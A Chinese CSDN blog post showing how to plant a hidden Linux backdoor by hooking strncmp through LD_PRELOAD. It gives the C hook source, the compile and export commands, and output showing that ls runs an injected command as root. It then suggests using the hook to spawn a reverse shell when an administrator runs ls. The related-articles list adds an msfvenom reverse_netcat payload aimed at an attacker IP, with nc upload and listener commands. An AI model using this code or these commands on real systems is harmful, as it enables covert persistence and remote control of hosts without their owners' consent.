【权限维持】linux下使用动态链接库制作隐藏后门

最新推荐文章于 2024-03-31 16:25:35 发布
最新推荐文章于 2024-03-31 16:25:35 发布
阅读量354 收藏
点赞数
文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Muxi_k/article/details/130214811
版权

什么是LD_PRELOAD

LD_PRELOAD 是 Linux/Unix 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。

如何利用LD_PRELOAD

由于 LD_PRELOAD 可以指定在程序运行前优先加载的动态链接库,那我们可以重写程序运行过程中所调用的函数并编译成动态链接库文件,然后通过指定 LD_PRELOAD 让程序优先加载的这个恶意的动态链接库,最后当程序再次运行时便会加载动态链接库中的恶意函数。具体的操作步骤如下:

  1. 定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等。
  2. 将包含替换函数的源码编译为动态链接库。
  3. 通过命令 export LD_PRELOAD="库文件路径”,设置要优先替换动态链接库即可
  4. 替换结束,要还原函数调用关系,用命令unset LD_PRELOAD 解除

一个简单的后门思路

当我们得知了一个系统命令所调用的库函数 后,我们可以重写指定的库函数进行劫持。这里我们以 ls 命令为例进行演示。

  1. 首先查看 ls 这一系统命令会调用哪些库函数:
[root@154-91-90-68 ~]# readelf -Ws /usr/bin/ls

Symbol table '.dynsym' contains 129 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND cap_to_text
     5: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND __progname@GLIBC_2.2.5 (3)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND localtime@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __mempcpy_chk@GLIBC_2.3.4 (4)
    11: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)
    14: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.2.5 (3)
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _exit@GLIBC_2.2.5 (3)
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.2.5 (3)
    17: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __fpending@GLIBC_2.2.5 (3)
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND isatty@GLIBC_2.2.5 (3)
    19: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigaction@GLIBC_2.2.5 (3)
    20: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND iswcntrl@GLIBC_2.2.5 (3)
  1. 重写函数库进行劫持

如上图所示可以看到很多库函数,我们随便选择一个合适的进行重写即可,这里我选择的是 strncmp@GLIBC_2.2.5

  • 编写hook_strncmp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
    // 这个函数用来编写或运行你的后门程序
    system(“id”);
}

int strncmp(const char*__s1, const char*__s2, size_t __n) {
    // 这里函数的定义可以根据报错信息进行确定
    if(getenv("LD_PRELOAD") == NULL) {
        return 0;
    }   
    unsetenv("LD_PRELOAD");
    payload();
}
  • 执行命令编译生成 hook_strcmp.so
gcc -shared -fPIC hook_strncmp.c -o hook_strncmp.so
  • 通过环境变量 LD_PRELOAD 来设置 hook_strncmp.so 能被其他调用它的程序优先加载
export LD_PRELOAD=$PWD/hook_strncmp.so
  • 最后执行 ls 发现成功执行了 id 命令, 说明此时成功劫持了 strncmp 函数。
[root@154-91-90-68 /]# ls
uid=0(root) gid=0(root) groups=0(root)
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  patch  proc  root  run  sbin  srv  sys  tmp  usr  var  www

总结

利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell

Muxi_k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux 环境变量LD_PRELOAD
小立仔
06-12 2973
Linux使用 环境变量 LD_PRELOAD 简介以及使用其来 hook标准库中的函数
Linux下的LD_PRELOAD环境变量与库打桩
weixin_44966641的博客
10-29 2067
Linux下的LD_PRELOAD环境变量与库打桩 LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库,一方面,我们可以以此功能来使用自己的或是更好的函数(比如,你可以使用Google开发的tcmalloc来提升效率),而另一方面,我们也可以向别人的程序注入程序,从而达到特定的目的。 我们下面以一个 foepn() 函数的例子来展示一下如何实现运行时库打桩。 正常库函数调用 首先,我们建立一个测试目录
Linux LD_PRELOAD动态链接库劫持
SHELLCODE_8BIT的博客
12-02 766
【代码】LD_PRELOAD。
【程序狂魔】掌握LD_PRELOAD轻松进行程序修改和优化的绝佳方法!
Lion_Long的博客
02-06 3023
LD_PRELOAD是Linux/Unix系统的一个环境变量,它可以影响程序的运行时的链接,它允许在程序运行前定义优先加载的动态链接库。通过这个环境变量,可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖系统的函数库。LD_PRELOAD 超脱于动态链接库的搜索路径先后顺序之外,它可以指定在程序运行前优先加载的动态链接库。我们可以自己实现一个函数,底层调用系统调用,理由LD_PRELOAD优先加载我们的函数。
linux动态链接库导出函数控制,控制linux动态链接库(so, standard object)导出函数...
weixin_39637260的博客
05-12 212
参考:http://www.lampchina.net/article/htmls/201006/Mjg4MDMy.html注意:参考文献中有一些函数是不能编译通过的。编译环境:gcc 4.4.3在windows中,我们可以指定__declspec(dllexport)定义来控制导出函数,在linux下,我们也有类似的控制参数。在GCC帮助文档 -fvisibility=default|inter...
LINUX下的openSSH后门制作.txt
01-09
Linux系统安全学习
利用安全描述符隐藏服务后门进行权限维持1
08-03
cmd 创建启动服务sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
每个进程都会有一个PID,而每一个PID都会在/proc目录下有一个相应的目录,这是linux(当前内核2.6)系统的实现。 一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经...
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
超初级的linux后门制作方法
09-16
本文将详细介绍超初级的 Linux 后门制作方法,包括 Linux 文件权限、SetUID、SetGID 和 Sticky Bit 等概念的详细解释和操作方法。 Linux 文件权限Linux 系统中的一个重要概念,它决定了文件的访问权限和所有权。...
权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
最新发布
siu~
03-31 950
1、Web或用户到Linux-数据库类型 2、Web或用户到Linux-Capability能力 3、普通用户到Linux-LD_Preload加载so配合sudo 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
深入分析 LD_PRELOAD
布袋和尚
07-13 8899
是 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。1、程序的链接程序的链接可以分为以下三种静态链接库,在 Linux 下文件名后缀为 ,如 。在编译链接时直接将目标代码加入可执行程序。动态链接库,在 Linux 下是 文件,在编译链接时只需要记录需要链接的号,运行程序时才会进行
记一次隐藏动态库符号的探索过程
myctime的博客
03-02 3243
今天遇到一个需要隐藏动态库符号的需求,记录一下。 因为某些原因需要将定制的OPENSSL库进行封装成一个新的动态库,提供给其他用户使用。并且我们用到的这个OpenSSL库是经过改造的,与系统库里自带的OpenSSL是不相同的。 先贴出Makefile all:libsgcccrypto.a libsgcccrypto.so test crypto.o:crypto.h crypto.h ...
Linux使用readelf工具查看程序代码变量的内存空间布局情况
TinyHorse的博客
08-18 3463
内存空间布局
Linux 环境变量之 LD_PRELOAD & LD_LIBRARY_PATH & LD_DEBUG
热门推荐
lm_hao的专栏
10-07 1万+
Linux 环境共享库(如:动态库)链接时查找路径的具体过程和先后顺序,通过一个示例来尝试使用下面3个环境变量 1、 LD_LIBRARY_PATH 2、LD_PRELOAD 3、LD_DEBUG 和一个 rpath 路径来临时改变应用程序的共享库查找方式。
LD_PRELOAD理解
Fuji_Shikamaru的博客
06-03 2625
        这几天看到一个很有趣的变量LD_PRELOAD。这个词首先从字面意思来理解,LD和动态库有关,PRELOAD表示预加载,结合起来就是预先加载的动态库。那这个到底是什么,用来干什么的呢?        LD_PRELOAD是一个环境变量,用来加载动态库时寻找所需符号的路径,而且是优先级最高的寻找路径。换句话说,如我们代码需要加载动态库里面函数,众所周知,系统一般会去LD_LIBRAR...
出差学小白知识No6:LD_PRELOAD变量路径不对找不到库文件
qq_42595610的博客
10-23 225
交叉编译的时候出现以下问题,显示LD_PRELOAD变量找不到路劲。变量在找不到路径下的库文件的时候,直接对其进行赋值。以上几个指令必须要用的十分熟练。就没问题,然后重新编译。
从ndk编译,说到so文件结构以及ida导入、导出函数
jltxgcy的专栏
10-11 1931
一、背景 一直以来对ndk的编译链接所依赖的文件没有完成弄明白,还有ida的导入、导出函数与dynsym section之间的关系是什么? 二、ndk编译所依赖的文件 1、我们一般在Application.mk中指定所需要的平台版本和编译后so的架构。 APP_PLATFORM := android-21 APP_ABI := armeabi-v7a 这个android-21对应什么呢?这是android ndk的根目录。 这里指定的编译so时,链接时需要的so文件,如果指定了andro.
linux符号表简介
oscarjulia的博客
06-28 3401
既然在链接时,需要重定位目标文件中引用的外部符号,显然,链接器需要知道这些符号的定义在哪里,为此汇编器在每个目标文件中创建了一个符号表,符号表中记录了这个模块定义的可以提供给其他模块引用的全局符号。可以使用工具readelf查看文件中的符号表,如目标文件foo2.o的符号表如下: root@baisheng:~/demo# readelf -s foo2.o Symbol table '.sy
kali linux权限维持,权限维持篇-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值